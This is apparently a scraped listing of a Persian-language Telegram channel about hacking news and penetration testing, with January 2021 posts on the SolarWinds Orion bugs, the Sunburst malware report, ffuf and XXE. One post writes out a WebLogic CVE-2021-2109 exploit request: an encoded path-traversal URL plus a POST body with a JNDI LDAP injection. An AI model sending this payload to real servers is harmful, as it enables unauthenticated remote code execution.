آدرس کانال:
دسته بندی ها:
فن آوری ها
زبان: فارسی
مشترکین:
1.27K
توضیحات از کانال
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید
بخش انگلیسی :
https://t.me/sec_nerd_en
برای عضویت در گروه پیام بدید:
@rect00
Ratings & Reviews
Reviews can be left only by registered users. All reviews are moderated by admins.
5 stars
0
4 stars
0
3 stars
0
2 stars
0
1 stars
2
آخرین پیام ها 20
2021-01-28 08:30:40
آسیب پذیری در گجت دیگری از وب لاجیک
CVE-2021-2109
۱- مخفی کردن درخواست برای دور زدن waf
۲- دریافت اطلاعات صحیح برای تشخیص آسیب پذیری
#weblogic
#rce
@sec_nerd
856 views05:30
2021-01-25 08:52:44
امنیت اطلاعات pinned a video
05:52
2021-01-25 08:47:13
خدا اون روز رو نیاره که هکرها و کارشناس های امنیت روی محصولاتت تمرکز کنن
استفاده زنجیره ای از چندین آسیب پذیری در orion شرکت solarwinds و دستیابی به RCE بدون نیاز به احراز هویت
https://www.thezdi.com/blog/2021/1/20/three-bugs-in-orions-belt-chaining-multiple-bugs-for-unauthenticated-rce-in-the-solarwinds-orion-platform
#solarwinds
#rce
@sec_nerd
674 views05:47
2021-01-25 08:32:25
نسخه جدید ابزار فازینگ دایرکتوری ffuf منتشر شد
https://github.com/ffuf/ffuf
#web
#pentest
@sec_nerd
550 views05:32
2021-01-21 19:11:15
مرکز عملیات دفاع سایبری مایکروسافت گزارش جدیدی از نحوه عملکرد بدافزار sunburst منتشر کرد.
در این گزارش جزییات واضح تری از عملکرد هکرها در این حمله گسترده ارائه شده است.
هکرها قسمت اول حمله خود که استفاده از sunburst است را از بخش ایمپلنت ها یعنی teardrop و raindrop جدا کردند تا حرکاتشان کاملا غیر قابل شناسایی باشد.
مرکز CDOC مایکروسافت میگوید: عاملان حمله ی سولارویندز افراد ماهری هستند که با دقت حمله را طرحریزی و اجرا کرده اند بطوری که در طول عملیات ناشناس بوده و دسترسی خود را تثبیت کردند.
متن کامل:
https://thehackernews.com/2021/01/heres-how-solarwinds-hackers-stayed.html
#sunburst
#solarwinds
#microsoft
#news
@sec_nerd
934 views16:11
2021-01-21 13:16:04
پیام مخفی تیم بایدن در سورس کد صفحه ی whitehouse.gov
#news
#usa
@sec_nerd
839 views10:16
2021-01-21 13:14:39
#CVE-2021-2109(console) + CVE-2020-14883(unauth)
http://x.x.x.x:7001/console/css/%252e%252e%252f/consolejndi.portal
POST:
_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://127.0.0;1:1389/eval;AdminServer%22)
#weblogic
#rce
@sec_nerd
584 views10:14
2021-01-21 13:11:47
CVE-2021-2109 Weblogic Remote Code Execution involving HTTP protocol and JNDI injection gadget.
Here is the writeup
https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw
#weblogic
#rce
@sec_nerd
573 views10:11
2021-01-17 20:11:04
شرح عمیق حمله XXE
#xxe
#web
#pentest
@sec_nerd
849 views17:11
2021-01-15 20:35:13
امنیت اطلاعات pinned a photo
17:35